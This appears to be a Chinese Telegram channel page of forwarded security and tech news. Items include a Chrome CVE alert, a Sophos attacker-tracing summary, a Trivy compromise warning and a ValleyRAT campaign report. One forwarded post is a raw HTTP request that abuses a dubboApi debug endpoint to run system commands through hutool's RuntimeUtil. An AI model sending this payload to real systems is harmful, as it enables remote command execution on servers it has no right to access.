Puddin在TG上看到了啥
787 subscribers
1.68K photos
70 videos
87 files
2.46K links
会把想要收藏的东西堆在这里
#日常 #数码 #科技 #渗透 #碎碎念
Download Telegram
【高危漏洞预警】Google Chrome Skia越界写入漏洞 (CVE-2026-3909)

via WeRss
又是需要更新chrome的一天
This media is not supported in your browser
VIEW IN TELEGRAM
OpenWRT后台存在WiFi SSID XSS

调路由器时被WiFi名黑掉了(
Forwarded from [Patience Forever]
回过头又仔细看了下 Sophos 溯源关天峰。

2018年,Sophos 的印度子公司遭受了攻击,并被部署内核级(Netfilter)的 Rootkit.
2020年,Sophos X-Ops 团队主要通过:漏洞赏金遥测信息追踪到 Gbigmao 位于四川无声科技。同时,还追踪到另一位于成都的电子科技大学背景的 TStark.
2021年,攻击者开始反制遥测系统,并被记录。
2022年,著名的 CVE-2022-1040 被一位自称来自日本的匿名研究人员提交,并拿到了2万美元赏金,但 Sophos 发现其 IP 地址位于中国,并且该漏洞在被提交给官方前,就已被用于实战攻击和此前相同的目标(西藏)。并且 Sophos 再次通过遥测和管理员帐户的电子邮件地址关联到一位中国攻击性安全研究员和 Linux shellcode 专家。

> 攻击者通过部署 JAVA 内存马,并用 LD_PRELOAD 注入 SSHD 实现持久化,同时还会窃取管理员面板登录密码。在 CVE-2022-3236 中使用了 Perl 作为持久化。

防火墙/杀毒软件能够通过遥测精准锁定个人终端,获取设备上的文件,甚至能通过定向推送更新远控设备。

Sophos 如何标记需要远控的设备?频繁电源循环,固件回滚,免费网络邮箱,大量设备运行着不同且频繁更新的固件版本,LAN口连接的设备数量极少,WAN口使用私有 IP 地址并通过其他设备中转。此外,其他行为也可能触发告警:

(1)异常系统命令:向临时目录写入和执行文件,运行自带黑客工具(masscan),使用 vim 直接编辑并运行脚本,flashrom和dd等命令
(2)异常数据库字段
(3)反常外连

参考:

Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
‘Cloud Snooper’ Attack Bypasses Firewall Security Measures
Inside a Firewall Vendor's 5-Year War With the Chinese Hackers Hijacking Its Devices
Forwarded from K4YT3X's Channel (K4YT3X)
有这么个伄人 dylanmtaylor 在到处开 PR 给个个 Linux 系统加出生日期的支持,甚至 systemd 已经 merge 了,不知道这人是不是 Facebook 或者什么政府的人

https://github.com/systemd/systemd/pull/40954
https://github.com/archlinux/archinstall/pull/4290
https://github.com/canonical/ubuntu-desktop-provision/pull/1338

我还没看到 Arch 的讨论,如果有的话我也得说两句,但是我本人坚决反对给 OS 加 censorship;California 用户想用可以去自己 fork 每一个 distro,为自己州通过的**法律买单

要保证你家孩子不看你不想他看的东西你可以设置 parental control 和 family DNS,一点时间都没有的话那就别生

一个二个都要上传 ID 验证年龄,真的看得我血压高

最近相关的负面消息太多了,我可能考虑写一篇 blog 详细讨论一下这个问题,但是在这个问题平息之前我会不断表明立场、游说身边的人反对法案,和开发类似 conclave 的项目对抗这些侵犯隐私的法律和措施
5
还有一个疑点是cursor好像直接拿到了base模型进行训练,kimi也同时确认了他们有授权

cursor连授权都拿到了却连提一嘴kimi都不愿意,能骗得了谁
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from 蓝点网订阅频道
#安全警告 开源漏洞扫描器Trivy日前再次被黑,黑客利用权限将发布仓库中的75个版本替换为恶意版本(包括最新版)。

使用Trivy工具扫描漏洞的开发者请立即更新SSH密钥、API凭据、数据库密码、Git、Docker配置以及其他敏感信息。

via Trivy discussions 10425

🤪订阅 😁X 解封 👍CN2VPS
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Eternal_安全内参
POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 14
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

[["whoami"]]
Eternal_安全内参
cn.hutool
偷懒的码农,动态的调用,开放的漏洞
Forwarded from LoopDNS资讯播报
银狐木马疑似在 Telegram 不同主题群组中批量传播

近期,我们持续接收到多份来自 Telegram 群组场景的可疑样本。尽管这些样本在文件命名、内容伪装和社工主题上各不相同,但其执行链、下载逻辑、侧载方式、持久化痕迹及通信配置高度一致,显示出明显的工程化投递特征。结合投稿来源和样本比对结果研判,这是一轮疑似由银狐相关团伙面向不同主题 Telegram 群组实施的批量化定向投递活动。本文将围绕该批样本的攻击流程、持久化机制、网络伪装与家族指纹展开分析,并结合 Winos4 / ValleyRAT 特征进行关联研判,为安全防护与事件响应提供参考。

阅读全文
Forwarded from 蓝点网订阅频道
#人工智能磅消息!微信推出 ClawBot 插件,正式接入原版 OpenClaw AI 机器人项目。

用户只需要安装 weixin-cli 插件即可使用微信扫码完成绑定,之后就可以收发消息,唯一不好的是 ClawBot 机器人仅允许转发 24 小时以内的消息,即用户超过 24 小时没主动给机器人发消息,那么用户将无法看到 OpenClaw 下发的消息。

查看全文:https://ourl.co/112284?t

🤪订阅 😁X 解封 👍CN2VPS
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
张小龙最像活人的一次
This media is not supported in your browser
VIEW IN TELEGRAM